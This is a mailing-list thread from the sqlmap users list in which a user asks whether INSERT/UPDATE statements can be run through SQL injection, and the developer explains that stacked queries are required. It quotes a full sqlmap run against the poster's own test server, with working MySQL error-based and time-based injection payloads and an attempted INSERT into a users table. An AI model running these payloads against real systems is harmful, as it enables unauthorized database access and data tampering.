sqlmap-users

[sqlmap-users] insert via injection

[Kirill M. <l0...@l0...>]

Hi,

is it possible to make "insert/update" queries via sql injection bugs?

I tried at my test machine via "--sql-query", but i didn't see query in
request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
--sql-query="insert into users set user='aaa',pass='bbb';"

    sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover
tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as
session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into
users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under
'/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port
80</address>

SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok

############################################################################


-- 
Kirill Morozov
KIMO2-RIPE, RHCE

Re: [sqlmap-users] insert via injection

[Miroslav S. <mir...@gm...>]

hi Kirill.

for something like this stacked queries should be supported while you
can see that from your injection info there is no stacked injection
vulnerability (as other command than select cannot be inserted into
vulnerable query).

kr

On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote:
> Hi,
> is it possible to make "insert/update" queries via sql injection bugs?
> I tried at my test machine via "--sql-query", but i didn't see query in
> request_uri:
> (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
> $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
> --sql-query="insert into users set user='aaa',pass='bbb';"
>     sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover
> tool
>     http://sqlmap.sourceforge.net
> [*] starting at: 21:07:53
> [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as
> session file
> [21:07:53] [INFO] resuming injection data from session file
> [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [21:07:53] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: id
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: id=1 AND (SELECT 1212 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
> 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a)
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=1 AND SLEEP(5)
> ---
> [21:07:53] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux CentOS 5
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5.0
> do you want to retrieve the SQL statement output? [Y/n/a]
> [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into
> users set user='aaa',pass='bbb';'
> [21:07:54] [INFO] read from file
> '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> [21:07:54] [INFO] read from file
> '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> insert into users set user='aaa',pass='bbb'; [2]:
> [*] None
> [21:07:54] [INFO] Fetched data logged to text files under
> '/home/admin/sqlmap-dev/output/10.0.0.60'
> [*] shutting down at: 21:07:54
> (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
> $ cat t3.log
> HTTP request [#1]:
> GET /sql/user.php?id=1 HTTP/1.1
> Accept-Encoding: identity
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 10.0.0.60
> Accept-language: en-us,en;q=0.5
> Pragma: no-cache
> Cache-control: no-cache,no-store
> User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> Connection: close
> HTTP response [#1] (200 OK):
> Content-length: 949
> X-powered-by: PHP/5.1.6
> Uri: http://10.0.0.60:80/sql/user.php?id=1
> Server: Apache/2.2.3 (CentOS)
> Connection: close
> Date: Tue, 26 Apr 2011 19:07:53 GMT
> Content-type: text/html; charset=UTF-8
> HTTP_ACCEPT_ENCODING => identity
> HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
> HTTP_CONNECTION => close
> HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
> HTTP_HOST => 10.0.0.60
> HTTP_PRAGMA => no-cache
> HTTP_CACHE_CONTROL => no-cache,no-store
> PATH => /sbin:/usr/sbin:/bin:/usr/bin
> SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port
> 80</address>
>
> SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
> SERVER_NAME => 10.0.0.60
> SERVER_ADDR => 10.0.0.60
> SERVER_PORT => 80
> REMOTE_ADDR => 10.0.0.60
> DOCUMENT_ROOT => /var/www/html
> SERVER_ADMIN => root@localhost
> SCRIPT_FILENAME => /var/www/html/sql/user.php
> REMOTE_PORT => 41083
> GATEWAY_INTERFACE => CGI/1.1
> SERVER_PROTOCOL => HTTP/1.1
> REQUEST_METHOD => GET
> QUERY_STRING => id=1
> REQUEST_URI => /sql/user.php?id=1
> SCRIPT_NAME => /sql/user.php
> PHP_SELF => /sql/user.php
> REQUEST_TIME => 1303844873
> ok
> ############################################################################
>
> --
> Kirill Morozov
> KIMO2-RIPE, RHCE
>
>
>
> ------------------------------------------------------------------------------
> WhatsUp Gold - Download Free Network Management Software
> The most intuitive, comprehensive, and cost-effective network
> management toolset available today.  Delivers lowest initial
> acquisition cost and overall TCO of any competing solution.
> http://p.sf.net/sfu/whatsupgold-sd
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B